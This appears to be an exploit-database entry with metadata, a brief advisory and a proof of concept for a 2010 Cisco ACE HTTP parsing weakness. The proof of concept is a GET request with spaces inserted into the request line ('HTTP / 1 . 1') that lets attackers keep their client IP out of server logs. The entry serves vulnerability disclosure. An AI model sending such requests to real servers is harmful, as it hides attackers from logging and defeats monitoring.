Cisco Application Control Engine (ACE) - HTTP Parsing Security

Author: Alexis Tremblay
type: remote
platform: hardware
port: 
date_added: 2010-05-07 
date_updated: 2014-07-04 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/40002/info

Cisco Application Control Engine (ACE) is prone to a security weakness that may allow attackers to obfuscate HTTP server log entries.

Attackers can exploit this issue to avoid having client IP addresses logged by servers.

GET / HTTP / 1 . 1
HOST: Myserver.com
CONNECTION: KEEP-ALIVE

GET / HTTP/1.1
HOST: Myserver.com
CONNECTION: KEEP-ALIVE